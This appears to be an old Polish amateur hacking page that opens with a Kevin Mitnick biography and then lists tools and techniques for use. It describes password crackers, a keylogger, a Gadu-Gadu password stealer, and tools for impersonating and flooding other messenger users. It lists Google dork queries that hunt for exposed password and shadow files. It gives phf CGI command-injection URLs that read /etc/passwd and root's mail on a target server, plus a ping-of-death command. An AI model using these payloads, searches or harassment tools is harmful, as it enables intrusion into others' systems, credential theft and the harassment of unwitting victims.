Witam na Dark-Site-Hacking
Linki:
Download:
Opis programów na dole
Ta strona została poswięcona jednemu z najwiekszych hakerów tego swiata, czyli oczywiscie Kevinowi Mitnickowi.
Ta strona powstala, aby tym ktorzy nie znaja Kevina Mitnicka przyblizyć jego historie.
Kevin David Mitnick(ur.6 sierpnia 1963r. w Van Nuys, Kalifornia)-jeden z najbardziej znanych hakerow na swiecie. Za wielokrotne włamania został skazany na wieloletnie więzienie. 15 lutego 1995 roku FBI za posrednictwem dziennikarza komputerowego Johna Markoffa i Tsutomu Shimomury aresztowało go.Zarzucono mu włamanie na terenie USA do kilku ważnych systemow.Kevinowi nigdy nie zarzucono czerpania materialnych korzysci z crackingu. Po aresztowaniu Mitnick spędził w areszcie cztery lata i 5 miesięcy przed wydaniem wyroku. Przetrzymywano go w całkowitej izolacji, o czym żartował: żebym nie mógł zainicjować zmasowanego ataku nuklearnego z więziennego aparatu telefonicznego. Wielu ludzi uznało go za bohatera walczacego z bezwzględnymi korporacjami, co zaowocowało stworzeniem ruchu Free Kevin. Kevin z więzienia wyszedł w styczniu 2000 roku, ale zakaz korzystania z internetu obejmował go do 21 stycznia 2003r. Wieczorem 21 stycznia 2003 roku, w telewizyjnym programie The Screen Savers w Tech TV, Kevin po raz pierwszy wszedł na strone internetowa, był to blog jego dziewczyny. Ksiażka Jonathana Littmana Scigany - rozmowy z Kevinem Mitnickiem (przekład Tomasz Misiorek) opisuje okolicznosci aresztowania i uwięzienia Mitnicka oraz złudne bezpieczeństwo sieci publicznych. Biografia Kevina Mitnicka oraz okolicznosci jego zatrzymania zostały również opisane w ksiażce pt. Hacker i samuraj autorstwa Jeffa Goodella (przekł. Andrzej Ceynowa), wydanej nakładem Gdańskiego Wydawnictwa Psychologicznego w 1996 roku. W marcu 2005 roku ukazała się druga ksiażka Mitnicka The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders, and Deceivers , napisana wspólnie z Williamem L. Simonem. Data jej premiery w Polsce przypada na lipiec 2006 roku. Została wydana pod tytułem Sztuka infiltracji. Czyli jak włamać się do sieci komputerowych. Biblia hakerów. W roku 2000 ukazał się film "Operation Takedown", który przedstawia kilkanascie miesięcy z życia hackera poprzedzajacych moment jego zatrzymania przez FBI.
BrutusAET2-program służacy między innymi do odzyskiwania hasła swojego adresu e-mail za pomoca słowników (służy też do odzyskiwania haseł innych rzeczy innymi metodatmi) Program obsługuje: Http,Ftp,Pop3,Telnet,SMB(NetBIOS).
Keylogger-program pozwalajacy zapisać do pliku wszystko co jest pisane na klawiaturze.
Lock&Unlock Folder-to prosty program kodujacy dane. Pozwala zakodować hasłem wybrany katalog, odbierajac dostęp do danych w nim zawartych osoba trzecim. Aplikacja używa mocnego algorytmu szyfrujacego "BLOWFISH". Długosć klucza (hasła) decyduje o mocy szyfru.
Cwaniak gg-program do łamania hasła gadu-gadu z pliku config.dat,który jakby ktos nie wiedział znajduje się w C:\Documents and Settings\Konto\Gadu-Gadu\Kontogg
Prowokator gg-Program służy do robienia "jaj" z dowolnymi użytkownikami Gadu-Gadu. Instrukcja Użycia: - Rejestrujesz sobie nowy numer GG, - Wpisujesz ten numer i hasło do niego do 2 lewych okienek, - Wpisujesz numer i nazwę pierwszej ofiary prowokacji, - Wpisujesz numer i nazwę drugiej ofiary prowokacji, - Klikasz połacz, - Teraz musisz odpowiednio zagadać do pierwszej i drugiej ofiary, lub do dwóch jednoczesnie. Zaczyna się ich dialog, a ty czytasz i smiejesz się z nich. Możesz w każdej chwili podszywać się pod jedną lub druga osobę i zagadywać w trakcie ich rozmowy. Jeżeli chcesz poprawić sobie humor użyj programu
Resource Hacker 3.4.0.79-Jeden z najpopularniejszych edytorów plików EXE, DLL, OCX i CPL. Umożliwia ingerowanie we wnętrze aplikacji i zmianę na przykład jej ikony, dzwięku odtwarzanego podczas uruchamiania lub ekranu powitalnego, funkcjonuje na systemach Windows XP 32-bit, Windows Vista 32-bit, Windows 9x, Windows NT 4.0, Windows 2000.
GG flooder-program do zalewania użytkownika gadu-gadu duża iloscia wiadomosci, efekty sa oczywiste.
Aircrack-ng 0.9.3(wersja pod windows)-bardzo zaawansowane narzędzie umożliwiajace poznanie wartosci klucza WEP oraz PSK, stosowanego w większosci sieci WiFi.
Zabawa z google :
************************************* "Index of /admin" "Index of /password" "Index of /mail" "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess index of ftp +.mdb allinurl:/cgi-bin/ +mailto administrators.pwd.index authors.pwd.index service.pwd.index filetype:config web gobal.asax index allintitle: "index of/admin" allintitle: "index of/root" allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov inurlasswd filetype:txt inurl:admin filetype:db inurl:iisadmin inurl:"auth_user_file.txt" inurl:"wwwroot/*." top secret site:mil confidential site:mil allinurl: winnt/system32/ allinurl:/bash_history intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart inurl:"viewerframe?mode=motion" intitle:"Live View / - AXSIS "robots.txt" "disallow:" filetype:txt inurl:_vti_pvt_ "service.pwd" inurl:"phphotoalbum/upload" "vnc desktop" inurl:5800 inurl:"port_255" -htm intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@" *************************************
Zabawa z telnetem :
1) wchodzimy w START > URUCHOM > wpisujemy TELNET i ok 2) wpisujemy literkę o i klikamy ENTER 3) wpisujemy towel.blinkenlights.nl i znów ENTER 4) teraz zostało nam chwilkę poczekać i jesli wszystko zrobilismy dobrze to za chwilę obejrzymy sobie 'Star Wars'ów'
Jakby ktos potrzebował tutaj jest adres Narodowej Biblioteki alpha.bn.org.pl
Dziury w www:
1 phf - sciaganie passwd przez przegladarke Jeden ze starych sposobow: http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd (dla lam: w miejsce xxx.xxx.xxx wpisujesz adres servera. ktory jest celem ataku np free.polbox.pl) Jesli hasla beda shadowane(!, * itd w miejscu hasel) to mozna sprobowac /etc/shadow , ale male szanse, ze zadziala. Ale lepiej uzyc kilku komend: http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna me=&Qoffice_phone= http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname= haqr&Qemail=&Qnickname=&Qoffice_phone= http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd %0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone= http://thegnome.com/~someuser/passwd http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname =haqr&Qemail=&Qnickname=&Qoffice_phone= Wykonaja one cos w tym stylu: id ls -la ~someuser cp /etc/passwd ~someuser/passwd (normal URL access to get the passwd file) rm ~someuser/passwd W ten sposob mozna nawet probowac czytac czyjas poczte. (np admina) http://www.xxx.xxx.pl/cgi-bin/phf?Qalias=x%0a/bin/cat%20/usr/spool/mail/root /... lub tak http://www.serwer.com/cgi-bin/phf.cgi?.../var/spool/mail/root (http://www.serwer.com/cgi-bin/phf.cgi?.../var/spool/mail/username)
Atak Ping of death:
Ping of death - sposób ataku na serwer internetowy za pomoca wysłania zapytania ping (ICMP Echo Request) w pakiecie IP o rozmiarze większym niż 65535 bajtów. Atak Większosć implementacji programu ping nie pozwala na wysłanie takiego pakietu. Jednym z wyjatków jest oprogramowanie dołaczone do Windows 95 lub Windows NT. Sposób ataku jest bardzo prosty: ping -l 65510 (adres ip) Do 65510 bajtów dodany zostanie nagłówek IP (20 bajtów) i zapytanie ICMP Echo Request (8 bajtów). Może to spowodować awarię atakowanego systemu lub zawieszenie działajacej na nim aplikacji.
Narzędzia: